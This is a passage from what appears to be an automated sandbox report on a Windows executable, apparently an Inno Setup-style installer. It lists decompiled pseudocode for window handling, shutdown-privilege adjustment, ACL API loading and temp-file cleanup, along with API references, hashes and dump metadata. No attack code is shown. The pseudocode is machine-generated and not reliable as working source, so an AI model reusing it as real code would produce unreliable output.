									 *((intOrPtr*)(_v40 + 0x1c + _t95 * 8)) = _v44;
									_t125 = _t125 + 0x14;
									_t100 = _t100 + 1;
									_t123 = _t123 - 1;
									__eflags = _t123;
									if(_t123 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L17;
								}
								E00403304();
								goto L16;
							}
						}
					}
				}
				L17:
			}

0x004593e5
0x004593e7
0x004593ed
0x004593ef
0x004593f2
0x004593f5
0x00459400
0x00459609
0x00459612
0x00459419
0x0045941e
0x00459423
0x00459425
0x0045942a
0x0045942b
0x00459430
0x00459432
0x00459437
0x00459438
0x0045943d
0x00459440
0x00459445
0x00459446
0x0045944b
0x00459450
0x00000000
0x0045946a
0x0045946c
0x0045948c
0x0045948e
0x00459490
0x00000000
0x00459496
0x00459498
0x00459499
0x0045949e
0x004594a1
0x004594af
0x004594b5
0x004594b8
0x00459533
0x00459543
0x00459546
0x00459548
0x0045955f
0x0045957b
0x0045957e
0x00459580
0x0045958e
0x00459590
0x00459593
0x00459596
0x004595a4
0x00459582
0x00459582
0x00459587
0x00000000
0x00459587
0x0045954a
0x0045954a
0x00000000
0x0045954a
0x004594ba
0x004594ba
0x004594bb
0x004594bd
0x004594ef
0x004594f8
0x004594fe
0x0045950c
0x00459515
0x0045951e
0x00459528
0x0045952c
0x0045952f
0x00459530
0x00459530
0x00459531
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00459531
0x004594e3
0x00000000
0x004594e3
0x004594b8
0x00459490
0x00459450
0x00000000

APIs

GetVersion.KERNEL32 ref: 00459406
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045941E
6D2B5550.KERNEL32(00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 0045942B
6D2B5550.KERNEL32(00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459438
6D2B5550.KERNEL32(00000000,SetEntriesInAclW,00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459446
AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,004595FE), ref: 004594DA

Strings

SetNamedSecurityInfoA, xrefs: 00459432
advapi32.dll, xrefs: 00459419
SetEntriesInAclW, xrefs: 00459440
GetNamedSecurityInfoA, xrefs: 00459425

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$AllocateHandleInitializeModuleVersion
String ID: GetNamedSecurityInfoA$SetEntriesInAclW$SetNamedSecurityInfoA$advapi32.dll
API String ID: 1345525422-3478141794
Opcode ID: ab415e3e0f897cf2df68723fca65fd79072db8db920f1f4b04ce7397b22c2cd0
Instruction ID: 6e8e1835638e55bd0808fe4d4a4ad931b2a57a08ee475610d27ccb265c7d6b2e
Opcode Fuzzy Hash: ab415e3e0f897cf2df68723fca65fd79072db8db920f1f4b04ce7397b22c2cd0
Instruction Fuzzy Hash: 3D516371A00209EFDB11DF99C881BAFB7F9EB48701F20406AF905E7281D7799D19CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422A74 Relevance: 18.3, APIs: 12, Instructions: 255
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00422A74(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				void* __ecx;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;
				struct HWND__* _t106;
				long _t116;
				long _t150;
				intOrPtr _t156;
				int _t161;
				intOrPtr _t162;
				intOrPtr _t182;
				intOrPtr _t186;
				struct HWND__* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				void* _t207;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t214;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;

				_t227 = _t228;
				_push(0xf031);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x119) & 0x00000004) != 0) {
					E00408EA0(__ebx, 0xf031, 1, __edi, __esi);
					E00403264();
				}
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000004;
				_push(_t227);
				_push(0x422dd6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t95 = _v8;
					_t232 =  *((char*)(_t95 + 0xc7));
					if( *((char*)(_t95 + 0xc7)) == 0) {
						 *[fs:eax] = _t228;
						E00402D48(_v8, 0xffdd, 0xf031, __eflags,  *[fs:eax], 0x422cdd, _t227);
						_pop(_t212);
						_pop(_t207);
						 *[fs:eax] = _t212;
						_t100 =  *0x48d62c; // 0x21d0660
						__eflags =  *((intOrPtr*)(_t100 + 0x40)) - _v8;
						if( *((intOrPtr*)(_t100 + 0x40)) == _v8) {
							__eflags = 0;
							E00422044(_v8, _t207, 0);
						}
						_t102 = _v8;
						__eflags =  *((char*)(_t102 + 0x116)) - 1;
						if( *((char*)(_t102 + 0x116)) != 1) {
							_t103 = _v8;
							__eflags =  *(_t103 + 0x119) & 0x00000008;
							if(( *(_t103 + 0x119) & 0x00000008) == 0) {
								_t195 = 0;
								_t105 = E004183F8(_v8);
								_t106 = GetActiveWindow();
								__eflags = _t105 - _t106;
								if(_t105 == _t106) {
									_t116 = IsIconic(E004183F8(_v8));
									__eflags = _t116;
									if(_t116 == 0) {
										_t195 = E0041F20C(E004183F8(_v8));
									}
								}
								__eflags = _t195;
								if(_t195 == 0) {
									ShowWindow(E004183F8(_v8), 0);
								} else {
									SetWindowPos(E004183F8(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t195);
								}
							} else {
								SetWindowPos(E004183F8(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E004168C8(_v8);
						}
					} else {
						 *[fs:eax] = _t228;
						E00402D48(_v8, 0xffdc, 0xf031, _t232,  *[fs:eax], 0x422b02, _t227);
						_pop(_t214);
						 *[fs:eax] = _t214;
						if( *((char*)(_v8 + 0x117)) == 4) {
							if( *((char*)(_v8 + 0x116)) != 1) {
								_t198 = E004233C0() -  *(_v8 + 0x2c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc ebx, 0x0");
								}
								_t222 = E004233B8() -  *(_v8 + 0x30);
								__eflags = _t222;
								_t223 = _t222 >> 1;
								if(_t222 < 0) {
									asm("adc esi, 0x0");
								}
							} else {
								_t182 =  *0x48d628; // 0x21d2410
								_t202 = E004148D4( *((intOrPtr*)(_t182 + 0x28))) -  *(_v8 + 0x2c);
								_t199 = _t202 >> 1;
								if(_t202 < 0) {
									asm("adc ebx, 0x0");
								}
								_t186 =  *0x48d628; // 0x21d2410
								_t225 = E00414918( *((intOrPtr*)(_t186 + 0x28))) -  *(_v8 + 0x30);
								_t223 = _t225 >> 1;
								if(_t225 < 0) {
									asm("adc esi, 0x0");
								}
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							if(_t223 < 0) {
								_t223 = 0;
							}
							 *((intOrPtr*)( *_v8 + 0x4c))( *(_v8 + 0x30),  *(_v8 + 0x2c));
						}
						 *((char*)(_v8 + 0x117)) = 0;
						if( *((char*)(_v8 + 0x116)) != 1) {
							ShowWindow(E004183F8(_v8),  *(0x48c5dc + ( *(_v8 + 0x112) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x112) != 2) {
								ShowWindow(E004183F8(_v8),  *(0x48c5dc + ( *(_v8 + 0x112) & 0x000000ff) * 4));
								_t150 =  *(_v8 + 0x30) << 0x00000010 |  *(_v8 + 0x2c);
								__eflags = _t150;
								CallWindowProcA(0x405f3c, E004183F8(_v8), 5, 0, _t150);
								E00414EDC(_v8);
							} else {
								_t161 = E004183F8(_v8);
								_t162 =  *0x48d628; // 0x21d2410
								SendMessageA( *( *((intOrPtr*)(_t162 + 0x28)) + 0x130), 0x223, _t161, 0);
								ShowWindow(E004183F8(_v8), 3);
							}
							_t156 =  *0x48d628; // 0x21d2410
							SendMessageA( *( *((intOrPtr*)(_t156 + 0x28)) + 0x130), 0x234, 0, 0);
						}
					}
				}
				_pop(_t211);
				 *[fs:eax] = _t211;
				_push(0x422ddd);
				_t94 = _v8;
				 *(_t94 + 0x119) =  *(_t94 + 0x119) & 0x000000fb;
				return _t94;
			}

0x00422a75
0x00422a77
0x00422a78
0x00422a79
0x00422a7a
0x00422a7b
0x00422a85
0x00422a9f
0x00422aa4
0x00422aa4
0x00422aac
0x00422ab5
0x00422ab6
0x00422abb
0x00422abe
0x00422ac8
0x00422ace
0x00422ad1
0x00422ad8
0x00422cc4
0x00422cce
0x00422cd5
0x00422cd7
0x00422cd8
0x00422cf4
0x00422cfc
0x00422cff
0x00422d01
0x00422d06
0x00422d06
0x00422d0b
0x00422d0e
0x00422d15
0x00422d24
0x00422d27
0x00422d2e
0x00422d4f
0x00422d54
0x00422d5b
0x00422d60
0x00422d62
0x00422d6d
0x00422d72
0x00422d74
0x00422d83
0x00422d83
0x00422d74
0x00422d85
0x00422d87
0x00422db9
0x00422d89
0x00422da1
0x00422da7
0x00422da7
0x00422d30
0x00422d48
0x00422d48
0x00422d17
0x00422d1a
0x00422d1a
0x00422ade
0x00422ae9
0x00422af3
0x00422afa
0x00422afd
0x00422b23
0x00422b33
0x00422b7e
0x00422b7e
0x00422b81
0x00422b83
0x00422b85
0x00422b85
0x00422b97
0x00422b97
0x00422b9a
0x00422b9c
0x00422b9e
0x00422b9e
0x00422b35
0x00422b35
0x00422b47
0x00422b4a
0x00422b4c
0x00422b4e
0x00422b4e
0x00422b51
0x00422b63
0x00422b66
0x00422b68
0x00422b6a
0x00422b6a
0x00422b68
0x00422ba3
0x00422ba5
0x00422ba5
0x00422ba9
0x00422bab
0x00422bab
0x00422bc4
0x00422bc4
0x00422bca
0x00422bdb
0x00422caf
0x00422be1
0x00422beb
0x00422c3e
0x00422c4f
0x00422c4f
0x00422c65
0x00422c6d
0x00422bed
0x00422bf2
0x00422bfd
0x00422c0c
0x00422c1c
0x00422c1c
0x00422c7b
0x00422c8a
0x00422c8a
0x00422bdb
0x00422ad8
0x00422dc0
0x00422dc3
0x00422dc6
0x00422dcb
0x00422dce
0x00422dd5

APIs

SendMessageA.USER32 ref: 00422C0C
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422DD6), ref: 00422C1C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: e7f00a6d4dbb32307503526ed7416ee1a9d53864fb750ca6b4413598fc404314
Instruction ID: f5e1b8c472ce89bcf9d6032173524dc5e4659697a22626c8740560310fbc38c9
Opcode Fuzzy Hash: e7f00a6d4dbb32307503526ed7416ee1a9d53864fb750ca6b4413598fc404314
Instruction Fuzzy Hash: FB918730B14258FFDB10EFA9DA45F9D77F4AF04714F5500AAF904A7292C779AE009B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041859C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041859C(void* __eax) {
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				intOrPtr _t33;
				void* _t43;
				struct HWND__* _t49;
				struct tagPOINT* _t51;

				_t51 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0xc0)) == 0) {
					GetWindowRect( *(_t43 + 0xc0), _t51);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0xc0),  &_v56);
					memcpy(_t51,  &(_v56.rcNormalPosition), 4 << 2);
					_t51 = _t51 + 0xc;
				}
				if((GetWindowLongA( *(_t43 + 0xc0), 0xfffffff0) & 0x40000000) != 0) {
					_t49 = GetWindowLongA( *(_t43 + 0xc0), 0xfffffff8);
					ScreenToClient(_t49, _t51);
					ScreenToClient(_t49,  &_v64);
				}
				 *(_t43 + 0x24) = _t51->x;
				 *((intOrPtr*)(_t43 + 0x28)) = _v68;
				 *((intOrPtr*)(_t43 + 0x2c)) = _v64.x - _t51->x;
				_t33 = _v64.y.x - _v68;
				 *((intOrPtr*)(_t43 + 0x30)) = _t33;
				return _t33;
			}

0x0041859f
0x004185a2
0x004185b2
0x004185e4
0x004185b4
0x004185b4
0x004185c8
0x004185d8
0x004185d8
0x004185d8
0x004185fc
0x0041860c
0x00418610
0x0041861b
0x0041861b
0x00418623
0x0041862a
0x00418634
0x0041863b
0x0041863f
0x00418648

APIs

IsIconic.USER32 ref: 004185AB
GetWindowPlacement.USER32(?,0000002C), ref: 004185C8
GetWindowRect.USER32 ref: 004185E4
GetWindowLongA.USER32 ref: 004185F2
GetWindowLongA.USER32 ref: 00418607
ScreenToClient.USER32 ref: 00418610
ScreenToClient.USER32 ref: 0041861B

Strings

,, xrefs: 004185B4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 3ff8bffa87c723ba4d6ab3a04062349e6f2272cf5b500f472933a3aee130f1b2
Instruction ID: 3a9ba703cecd73ef0caae4595112f23853095bea5808b30e0bddf5b1c0855aff
Opcode Fuzzy Hash: 3ff8bffa87c723ba4d6ab3a04062349e6f2272cf5b500f472933a3aee130f1b2
Instruction Fuzzy Hash: 83114971505210ABDB00EF6DC885F9B77E8AB48314F05467EBD58DB286CB39D900CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00453A8C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00453A8C() {
				intOrPtr _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				long _t6;

				if( *0x48c0e0 == 2) {
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) == 0) {
						return E00453A6C();
					}
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					_t6 = GetLastError();
					if(_t6 != 0) {
						return E00453A6C();
					}
				}
				_push(0);
				_push(2);
				L00405FDC();
				if(_t6 == 0) {
					return E00453A6C();
				}
				return _t6;
			}

0x00453a96
0x00453aa8
0x00000000
0x00453aaa
0x00453abd
0x00453ac2
0x00453aca
0x00453ae4
0x00453ae9
0x00453af0
0x00000000
0x00453af2
0x00453af0
0x00453af9
0x00453afb
0x00453afd
0x00453b04
0x00000000
0x00453b06
0x00453b0e

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00453A9B
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453AA1
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453ABD
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453AE4
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453AE9

Part of subcall function 00453A6C: MessageBoxA.USER32 ref: 00453A86

6D744E70.USER32(00000002,00000000), ref: 00453AFD

Strings

SeShutdownPrivilege, xrefs: 00453AB6

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentD744ErrorLastLookupMessageOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 4041735982-3733053543
Opcode ID: fcfc5ad704e2be407fc782b20953fbd7ec609d854c6cae5866ca608daa6a9b43
Instruction ID: 7824377f0540d6fb5411cdbd46488cdb9907473de884ea60f0c9a0a2f57701ed
Opcode Fuzzy Hash: fcfc5ad704e2be407fc782b20953fbd7ec609d854c6cae5866ca608daa6a9b43
Instruction Fuzzy Hash: 29F01960A4430165E610FEA68C47B1B35989B4078BF50482FBD80A91C3DBBCDE0CCA6F

Uniqueness

Uniqueness Score: -1.00%

Function 0048A778 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0048A778(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				void* _t60;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t82 = _t83;
				_t84 = _t83 + 0xfffffeb4;
				_v336 = 0;
				_v12 = 0;
				_t60 = __eax;
				_push(_t82);
				_push(0x48a8b6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E004035DC( &_v336, __eax);
				E004036C4( &_v336, "isRS-???.tmp");
				_v8 = FindFirstFileA(E00403880(_v336),  &_v332);
				if(_v8 == 0xffffffff) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(E0048A8BD);
					E00403548( &_v336);
					return E00403548( &_v12);
				} else {
					_push(_t82);
					_push(0x48a88e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t84;
					do {
						if(E0040766C( &(_v332.cFileName), 5, "isRS-") == 0 && (_v332.dwFileAttributes & 0x00000010) == 0) {
							E004036A4( &_v336, 0x104,  &(_v332.cFileName));
							E00403708( &_v12, _v336, _t60);
							_t79 = _v332.dwFileAttributes;
							if((_t79 & 0x00000001) != 0) {
								_push(_t79 & 0xfffffffe);
								_push(E00403880(_v12));
								L00405BE4();
							}
							E00407064(_v12);
						}
					} while (FindNextFileA(_v8,  &_v332) != 0);
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(E0048A895);
					return FindClose(_v8);
				}
			}

0x0048a779
0x0048a77b
0x0048a786
0x0048a78c
0x0048a78f
0x0048a793
0x0048a794
0x0048a799
0x0048a79c
0x0048a7ae
0x0048a7be
0x0048a7d4
0x0048a7db
0x0048a897
0x0048a89a
0x0048a89d
0x0048a8a8
0x0048a8b5
0x0048a7e1
0x0048a7e3
0x0048a7e4
0x0048a7e9
0x0048a7ec
0x0048a7ef
0x0048a806
0x0048a822
0x0048a832
0x0048a837
0x0048a843
0x0048a848
0x0048a851
0x0048a852
0x0048a852
0x0048a85a
0x0048a85a
0x0048a86f
0x0048a879
0x0048a87c
0x0048a87f
0x0048a88d
0x0048a88d

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0048A8B6,?,?,00000000,0048D628,?,0048AA40,00000000,0048AA94,?,?,00000000,0048D628), ref: 0048A7CF
6D2B69D0.KERNEL32(00000000,00000010), ref: 0048A852
FindNextFileA.KERNEL32(000000FF,?,00000000,0048A88E,?,00000000,?,00000000,0048A8B6,?,?,00000000,0048D628,?,0048AA40,00000000), ref: 0048A86A
FindClose.KERNEL32(000000FF,0048A895,0048A88E,?,00000000,?,00000000,0048A8B6,?,?,00000000,0048D628,?,0048AA40,00000000,0048AA94), ref: 0048A888

Strings

isRS-, xrefs: 0048A7EF
isRS-???.tmp, xrefs: 0048A7B9

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 3541575487-3422211394
Opcode ID: 472a345b053270a6fddfeef5e1c84a9b333b4cceb07049350a27130868d0a259
Instruction ID: f71a1387bc5300d0acb67144f0d7af4670fdb4894ba7015dac9f99a2e5af6c39
Opcode Fuzzy Hash: 472a345b053270a6fddfeef5e1c84a9b333b4cceb07049350a27130868d0a259
Instruction Fuzzy Hash: 7C31C570900508AFEB14FF61CC41ACEB7BCDB45314F1048BBA808A3291EA789E558F65

Uniqueness

Uniqueness Score: -1.00%

Function 004729D4 Relevance: 9.2, APIs: 6, Instructions: 195
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004729D4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				char _v28;
				void* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v356;
				char _v360;
				intOrPtr _t91;
				signed int _t109;
				int _t112;
				signed int _t128;
				signed char _t130;
				int _t133;
				intOrPtr _t140;
				void* _t143;
				intOrPtr _t167;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				void* _t191;
				intOrPtr _t192;

				_t188 = __esi;
				_t187 = __edi;
				_t155 = __ecx;
				_t190 = _t191;
				_t192 = _t191 + 0xfffffe9c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v24 = 0;
				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t190);
				_push(0x472c9a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t192;
				_push(_v8);
				_push(_v12);
				_push(_v16);
				E0040377C();
				_v17 = 0;
				_v32 = FindFirstFileA(E00403880(_v24),  &_v352);
				if(_v32 == 0xffffffff) {
					_t91 = _a4;
					__eflags =  *(_t91 + 0x4c) & 0x00000020;
					if(( *(_t91 + 0x4c) & 0x00000020) == 0) {
						goto L21;
					} else {
						E004035DC( &_v356, _v8);
						E004036C4( &_v356, _v12);
						E004036C4( &_v356, 0x472cb8);
						_v32 = FindFirstFileA(E00403880(_v356),  &_v352);
						__eflags = _v32 - 0xffffffff;
						if(_v32 == 0xffffffff) {
							goto L21;
						} else {
							__eflags = 0;
							_push(_t190);
							_push(0x472c68);
							_push( *[fs:eax]);
							 *[fs:eax] = _t192;
							do {
								_t109 = E004727E8( &_v352);
								__eflags = _t109;
								if(_t109 == 0) {
									goto L19;
								} else {
									E004035DC( &_v356, _v12);
									E004036A4( &_v360, 0x104,  &(_v352.cFileName));
									E004036C4( &_v356, _v360);
									E004036C4( &_v356, 0x472cc4);
									_t128 = E004729D4(_v8, 0, _v16, _v356, _t187, _t188, _a4, _a8, _a12);
									__eflags = _t128;
									if(_t128 == 0) {
										goto L19;
									} else {
										_v17 = 1;
										E00403304();
										goto L21;
									}
								}
								goto L22;
								L19:
								_t112 = FindNextFileA(_v32,  &_v352);
								__eflags = _t112;
							} while (_t112 != 0);
							__eflags = 0;
							_pop(_t178);
							 *[fs:eax] = _t178;
							_push(0x472c6f);
							return FindClose(_v32);
						}
					}
				} else {
					_push(_t190);
					_push(0x472b45);
					_push( *[fs:edx]);
					 *[fs:edx] = _t192;
					do {
						_t130 = _v352.dwFileAttributes;
						if((_t130 & 0x00000010) != 0 || _a8 != 0 && (_t130 & 0x00000002) != 0) {
							goto L11;
						} else {
							E004717F8( *((intOrPtr*)(_a4 + 4)), _t155,  &_v28);
							_t140 = _a4;
							_t198 =  *(_t140 + 0x4b) & 0x00000010;
							if(( *(_t140 + 0x4b) & 0x00000010) != 0) {
								__eflags = _v12;
								if(__eflags != 0) {
									E0042CA40(_v28, _t155,  &_v356);
									_push(_v356);
									_push(_v12);
									E0042CA18(_v28, _t155,  &_v360);
									_push(_v360);
									E0040377C();
								}
							} else {
								_push(_v28);
								_push(_v12);
								_t155 = 0x104;
								E004036A4( &_v356, 0x104,  &(_v352.cFileName));
								_push(_v356);
								E0040377C();
							}
							_t143 = E00472888(_v28, 0, _t155, _t187, _t188, _t198, _a12);
							_pop(_t155);
							if(_t143 == 0) {
								goto L11;
							} else {
								_v17 = 1;
								E00403304();
								L21:
								_pop(_t167);
								 *[fs:eax] = _t167;
								_push(0x472ca1);
								E00403568( &_v360, 2);
								return E00403568( &_v28, 2);
							}
						}
						goto L22;
						L11:
						_t133 = FindNextFileA(_v32,  &_v352);
						__eflags = _t133;
					} while (_t133 != 0);
					__eflags = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x472b4c);
					return FindClose(_v32);
				}
				L22:
			}

0x004729d4
0x004729d4
0x004729d4
0x004729d5
0x004729d7
0x004729dd
0x004729de
0x004729df
0x004729e2
0x004729e8
0x004729ee
0x004729f1
0x004729f4
0x004729f7
0x004729fa
0x004729ff
0x00472a00
0x00472a05
0x00472a08
0x00472a0b
0x00472a0e
0x00472a11
0x00472a1c
0x00472a21
0x00472a3a
0x00472a41
0x00472b4c
0x00472b4f
0x00472b53
0x00000000
0x00472b59
0x00472b69
0x00472b77
0x00472b87
0x00472b9d
0x00472ba0
0x00472ba4
0x00000000
0x00472baa
0x00472baa
0x00472bac
0x00472bad
0x00472bb2
0x00472bb5
0x00472bb8
0x00472bbe
0x00472bc3
0x00472bc5
0x00000000
0x00472bc7
0x00472bdc
0x00472bf2
0x00472c03
0x00472c13
0x00472c24
0x00472c2a
0x00472c2c
0x00000000
0x00472c2e
0x00472c2e
0x00472c32
0x00000000
0x00472c32
0x00472c2c
0x00000000
0x00472c39
0x00472c44
0x00472c49
0x00472c49
0x00472c51
0x00472c53
0x00472c56
0x00472c59
0x00472c67
0x00472c67
0x00472ba4
0x00472a47
0x00472a49
0x00472a4a
0x00472a4f
0x00472a52
0x00472a55
0x00472a55
0x00472a5d
0x00000000
0x00472a71
0x00472a7a
0x00472a7f
0x00472a82
0x00472a86
0x00472ab9
0x00472abd
0x00472ac8
0x00472acd
0x00472ad3
0x00472adf
0x00472ae4
0x00472af2
0x00472af2
0x00472a88
0x00472a88
0x00472a8b
0x00472a9a
0x00472a9f
0x00472aa4
0x00472ab2
0x00472ab2
0x00472afe
0x00472b03
0x00472b06
0x00000000
0x00472b08
0x00472b08
0x00472b0c
0x00472c6f
0x00472c71
0x00472c74
0x00472c77
0x00472c87
0x00472c99
0x00472c99
0x00472b06
0x00000000
0x00472b16
0x00472b21
0x00472b26
0x00472b26
0x00472b2e
0x00472b30
0x00472b33
0x00472b36
0x00472b44
0x00472b44
0x00000000

APIs

FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,00472C9A,?,00000000,?,00000000,?,00472DDE,00000000,00000000), ref: 00472A35
FindNextFileA.KERNEL32(000000FF,?,00000000,00472B45,?,00000000,?,?,00000000,?,00000000,00472C9A,?,00000000,?,00000000), ref: 00472B21
FindClose.KERNEL32(000000FF,00472B4C,00472B45,?,00000000,?,?,00000000,?,00000000,00472C9A,?,00000000,?,00000000), ref: 00472B3F
FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00472C9A,?,00000000,?,00000000,?,00472DDE,00000000), ref: 00472B98

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
